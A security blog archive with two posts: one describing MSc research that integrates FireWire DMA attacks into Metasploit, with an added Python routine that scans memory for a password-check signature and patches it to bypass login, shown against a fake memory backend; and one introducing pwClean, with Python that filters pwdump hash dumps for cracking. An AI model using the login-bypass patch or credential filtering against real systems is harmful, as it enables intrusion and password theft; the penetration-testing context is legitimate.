Archive for the Tools Category

Integrating DMA attacks into Metasploit

Posted in Research, Security, Tools on 2012/03/09 by mram

Note 1: this is not my research. I only (co)supervised MSc students Albert Spruyt and Rory Breuk.
Note 2: the work was done in only five weeks, including reporting. More updates may follow when the guys find some time to work on it a bit more.


DMA attacks are oldskool, but hard to perform, as no modern tool supports them easily. The oldskool attacks were also limited to bypassing the login screen (the Windows GINA) and searching memory for keys. Some small patches were made for other operating systems besides the Windows XP and Vista targets of the original winlockpwn, but the bottom line is that awareness of the attack has faded since it first appeared a few years back. A nice overview of all DMA-related research and attacks over the years can be found here.

The idea for this research came when I was once again fiddling with old Linux kernels and old Python code to successfully attack a client’s laptop with winlockpwn during a security test. I thought: “Wouldn’t it be cool if we could update the whole DMA attack thing to run on modern systems and integrate it into Metasploit, so we could use all the goodness Metasploit has to offer, like payload selection, session control, etc.?” Unable to find the time myself, I was doomed to keep using the old tooling.

But luckily I’m in good contact with the University of Amsterdam (System and Networking Engineering education) and was able to submit the topic for research by their MSc students. Rory Breuk and Albert Spruyt selected the topic and the research could start. They did the theoretical research and also created proof of concept code. Their paper can be found here, their presentation here, and their PoCs here. Oh, the PoC is called MOFO (Metasploit Over Firewire Ownage). With such a name it just has to be awesome ;-)

The PoC includes two attacks:

  • Payload insertion via Metasploit: use Metasploit to prepare a reverse_tcp payload, connect to the target system via FireWire, hit ‘exploit’ to insert the payload into memory, unplug the FireWire gear and walk away. Once the user gets back to the Ubuntu system and logs in, the injected code is triggered and a reverse TCP connection is made over the network back to the attacker’s machine. On Ubuntu 11.10 (the only supported OS at the moment) you get root-level control, as LightDM runs as root. All of this is transparent to the end user. See the screenshot below for the attacker’s point of view.
  • Session control over DMA: connect two machines via FireWire, launch the PoC code, and the attacking system can issue commands on the target system, all over FireWire and DMA instead of the network.
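
Both attacks rest on the same primitive the old tools used: read physical memory over the bus one page at a time, locate a byte signature, and write a few bytes back. The Python below is an added example, not the MOFO code or anything from the paper, that models that search-and-patch step against a constructed in-memory stand-in for the FireWire backend (`FakePhysicalMemory`, `DmaError`, the `CHECK_SIG` "check routine", the addresses and the unreadable page are all made up for the demo). It goes a little beyond the post in handling two things a real run trips over: a signature that straddles a 4 KiB page boundary, and pages the bus refuses to read. To use it for real you would swap the fake backend for an actual DMA read/write (for example the Python bindings of libforensic1394) and a signature for the target binary.

```python
import re
from typing import List, Tuple

PAGE = 4096  # the model reads physical memory one 4 KiB page per DMA request


class DmaError(IOError):
    """The backend could not read a physical page."""


class FakePhysicalMemory:
    """Constructed stand-in for a DMA backend such as a FireWire read/write
    primitive: a flat buffer plus a set of page numbers that refuse reads,
    mimicking physical ranges the bus does not return. Replace this class
    with a real backend to use scan() and patch() against a live target."""

    def __init__(self, size: int, unreadable_pages=()):
        self.size = size
        self.buf = bytearray(size)
        self.unreadable = set(unreadable_pages)

    def read(self, addr: int, length: int) -> bytes:
        if addr // PAGE in self.unreadable:
            raise DmaError(f"read of {addr:#x} refused")
        return bytes(self.buf[addr:addr + length])

    def write(self, addr: int, data: bytes) -> None:
        self.buf[addr:addr + len(data)] = data


def compile_signature(sig: str) -> Tuple[re.Pattern, int]:
    """Turn '85 c0 74 ?? 31 c0 c3' into (regex, length). '??' is a wildcard
    byte. The regex is a lookahead so it matches at a position without
    consuming bytes, which lets overlapping hits be reported too."""
    toks = sig.split()
    body = b"".join(b"." if t == "??" else re.escape(bytes([int(t, 16)]))
                    for t in toks)
    return re.compile(b"(?=" + body + b")", re.DOTALL), len(toks)


def scan(mem: FakePhysicalMemory, sig: str) -> List[int]:
    """Return every physical address at which sig matches.

    Memory is read page by page; the last len(sig)-1 bytes of the previous
    page are prepended to the current one so a signature straddling a page
    boundary is still found (and never counted twice, because a full match
    cannot fit inside the carried bytes alone). A page the backend refuses
    is skipped and the carry dropped, so a hit crossing into it is missed."""
    rx, n = compile_signature(sig)
    hits, carry = [], b""
    for addr in range(0, mem.size, PAGE):
        try:
            page = mem.read(addr, PAGE)
        except DmaError:
            carry = b""
            continue
        data = carry + page
        base = addr - len(carry)
        hits.extend(base + m.start() for m in rx.finditer(data))
        carry = data[-(n - 1):] if n > 1 else b""
    return hits


def patch(mem: FakePhysicalMemory, addr: int, expect_sig: str,
          new_bytes: bytes) -> bytes:
    """Overwrite memory at addr only if it still matches expect_sig, so a
    stale address (process gone, page reused) is refused instead of
    silently corrupting whatever lives there now. Returns the bytes read
    back after the write."""
    rx, n = compile_signature(expect_sig)
    if not rx.match(mem.read(addr, n)):
        raise ValueError(f"bytes at {addr:#x} no longer match {expect_sig!r}")
    mem.write(addr, new_bytes)
    return mem.read(addr, len(new_bytes))


# Constructed stand-in for the "is the password OK?" check the attack looks
# for; not real LightDM or GINA code: test eax,eax / jz rel8 / xor eax,eax / ret
CHECK_SIG = "85 c0 74 ?? 31 c0 c3"
CHECK_BYTES = bytes.fromhex("85c0741b31c0c3")


def demo() -> Tuple[List[int], bytes, List[int]]:
    """Plant three copies of the check routine in a 256 KiB fake memory:
    one straddling pages 3 and 4, one inside an unreadable page, one plain.
    Then flip the first hit's jz (74) into jmp (eb) and rescan."""
    mem = FakePhysicalMemory(64 * PAGE, unreadable_pages={5})
    mem.write(4 * PAGE - 3, CHECK_BYTES)
    mem.write(5 * PAGE + 0x40, CHECK_BYTES)
    mem.write(9 * PAGE + 0x120, CHECK_BYTES)
    hits = scan(mem, CHECK_SIG)
    patched = patch(mem, hits[0] + 2, "74 ??", b"\xeb")
    return hits, patched, scan(mem, CHECK_SIG)


if __name__ == "__main__":
    found, wrote, left = demo()
    print("hits:", [hex(h) for h in found], "patched:", wrote.hex(),
          "left:", [hex(h) for h in left])
```

The re-check inside `patch()` is the part worth keeping when you port this to a real bus: between the scan and the write the target keeps running, and a blind write to an address that has since been reused is how a DMA attack turns into a crash instead of a shell.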

You can find more details in their paper. It also includes ideas for future research on this topic, like how to implement multi-stage payloads (Meterpreter FTW!). So if you are interested, make sure to have a look.

Welcome additions to the code would be support for Windows targets and for multi-stage payloads like Meterpreter. But the main message is that Albert and Rory have shown that it is possible to integrate DMA attacks into Metasploit. Great research, kudos to them!

Happy hacking!

[TOOL] pwClean – cleaning your password dump files

Posted in Security, Tools on 2010/09/24 by mram

I finally picked up some code I had lying around and made something useful with it. Not a big thing, just a simple tool you can use to remove useless accounts and password hashes from the output of your favorite password dumping tool (pwdump, fgdump, gsecdump, etc.).

Skip the blabla and go straight to the Tools section.


So, you are doing a pentest and have several systems rooted, maybe even a domain controller. One of the steps after compromise is dumping the password hashes and getting them cracked. Knowing the passwords instead of only the hashes is an important step, as it can for example give you access to that important financial application that is not AD-integrated.


But now you have this text file with over 100K lines of password hashes. Sorting the hashes before cracking is essential, as your favorite tool dumps the hashes of many, many accounts you are not interested in (machine accounts, built-in accounts, password history, etc.).

You can filter by hand or with your favorite text editor, but you want it faster and easier.


Introducing pwClean: a simple yet effective Windows application that helps you with exactly this problem: cleaning up files with password hashes.

Using pwClean

Using pwClean to select Administrative accounts: contain 'adm' and in this case also '-a'


  • independent of the password dumping tool used (support for pwdump, pwdumpX, gsecdump, fgdump);
  • graphical user interface for easy clicky-click (I know you Windows pentesters like that);
  • can select administrative accounts, identified by *adm*;
  • lets you select your domain-specific ‘admin’ tag, e.g. if the naming convention uses ‘oper_<name>’ you enter ‘oper_’ as the admin identifier;
  • can remove system (machine) accounts, i.e. the ones with a trailing $;
  • can remove built-in accounts like Guest, krbtgt, SUPPORT_388945a0, HelpAssistant, TSInternetUser, IWAM_* and IUSR_*;
  • can remove password history accounts (_hist or _1) and will remove the ‘(current)’ tag;
  • supports multiple input files.

Not yet implemented:

  • removal of accounts of which only the SID is known and not the name (orphaned/deleted accounts that show a long SID string instead of an account name)
  • drag ‘n drop
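
The filtering pwClean does is simple enough to show in code. The Python script below is an added example, not pwClean itself or its source: it parses pwdump-style lines (`user:rid:lmhash:nthash:::`), applies the same removals and admin-tag selection listed above, strips the ‘(current)’ tag, de-duplicates entries across concatenated input files, and also drops the orphaned SID-only names from the not-yet-implemented list. The sample dump is constructed; the hash values are placeholders except for the well-known empty LM hash (aad3b435…) and the LM/NT hashes of ‘password’. Tolerance for a `DOMAIN\user` prefix and the `has_lm_hash()` flag are my additions, since a real LM hash is the first thing you want to crack.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Sequence

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash when no LM password is stored
# Built-in names listed in the post (matched case-insensitively) and the IIS prefixes.
BUILTIN_NAMES = {"guest", "krbtgt", "support_388945a0", "helpassistant", "tsinternetuser"}
BUILTIN_PREFIXES = ("iwam_", "iusr_")
# Password-history entries: "<user>_hist", "<user>_hist3" or "<user>_1" style suffixes.
HISTORY_RE = re.compile(r"_(?:hist\d*|\d+)$", re.IGNORECASE)
# Orphaned entries carry a SID where the name should be (assumed extension; the
# post lists this as not yet implemented in pwClean).
SID_RE = re.compile(r"^S-1-5-\d+(?:-\d+)+$")


@dataclass
class HashEntry:
    user: str
    rid: int
    lm: str
    nt: str

    def has_lm_hash(self) -> bool:
        """True when a real LM hash (crackable in minutes) is present."""
        return self.lm != EMPTY_LM

    def to_pwdump(self) -> str:
        return f"{self.user}:{self.rid}:{self.lm}:{self.nt}:::"


def short_name(user: str) -> str:
    """Drop an optional 'DOMAIN\\' prefix (gsecdump style) before classifying."""
    return user.rsplit("\\", 1)[-1]


def parse_line(line: str) -> Optional[HashEntry]:
    """Parse 'user:rid:lmhash:nthash:::'; returns None for headers and junk.
    The '(current)' tag some dumpers attach to the live entry is removed."""
    parts = line.strip().split(":")
    if len(parts) < 4 or not parts[1].isdigit():
        return None
    user = parts[0].replace("(current)", "")
    return HashEntry(user, int(parts[1]), parts[2].lower(), parts[3].lower())


def is_machine(user: str) -> bool:
    return short_name(user).endswith("$")


def is_builtin(user: str) -> bool:
    u = short_name(user).lower()
    return u in BUILTIN_NAMES or u.startswith(BUILTIN_PREFIXES)


def is_history(user: str) -> bool:
    return HISTORY_RE.search(short_name(user)) is not None


def is_orphaned_sid(user: str) -> bool:
    return SID_RE.match(short_name(user)) is not None


def is_admin(user: str, tags: Sequence[str] = ("adm",)) -> bool:
    """Admin if the name contains any tag, e.g. ('adm', 'oper_')."""
    u = short_name(user).lower()
    return any(t.lower() in u for t in tags)


def clean(lines: Iterable[str], *, drop_machine=True, drop_builtin=True,
          drop_history=True, drop_orphaned=True,
          admin_tags: Optional[Sequence[str]] = None) -> List[HashEntry]:
    """Filter dump lines (possibly several files concatenated). With
    admin_tags=None every surviving account is kept; with a tuple of tags
    only names containing one of them are kept. Duplicates are dropped."""
    out, seen = [], set()
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue
        if drop_machine and is_machine(e.user):
            continue
        if drop_builtin and is_builtin(e.user):
            continue
        if drop_history and is_history(e.user):
            continue
        if drop_orphaned and is_orphaned_sid(e.user):
            continue
        if admin_tags is not None and not is_admin(e.user, admin_tags):
            continue
        key = (e.user.lower(), e.nt)
        if key in seen:
            continue
        seen.add(key)
        out.append(e)
    return out


# Constructed sample dump; the last line repeats the first as if it came from
# a second input file. Only the 'password' hashes and EMPTY_LM are real values.
SAMPLE_DUMP = """\
Dumping password hashes (constructed header line, not a hash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76:::
WS01$:1105:aad3b435b51404eeaad3b435b51404ee:c4d9c1b2d6e0f3a7b8c9d0e1f2a3b4c5:::
adm_jdoe:1201:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
jdoe:1202:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
jdoe_hist1:1202:aad3b435b51404eeaad3b435b51404ee:a4f49c406510bdcab6824ee7c30fd852:::
oper_bsmith:1203:aad3b435b51404eeaad3b435b51404ee:0cb6948805f797bf2a82807973b89537:::
bsmith(current):1204:aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_WS01:1002:aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f:::
S-1-5-21-1004336348-1177238915-682003330-1300:1300:aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
"""

if __name__ == "__main__":
    for entry in clean(SAMPLE_DUMP.splitlines(), admin_tags=("adm", "oper_")):
        print(entry.to_pwdump())
```

Run it as-is to get the admin-only view; call `clean(lines)` without `admin_tags` for the full cleaned list. Note that a plain substring match on ‘adm’ also catches Administrator, which is what you want, but check the output once against your naming convention before feeding it to the cracker.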

Download link can be found in the section ‘Tools and Papers’.

Let me know if you have any comments.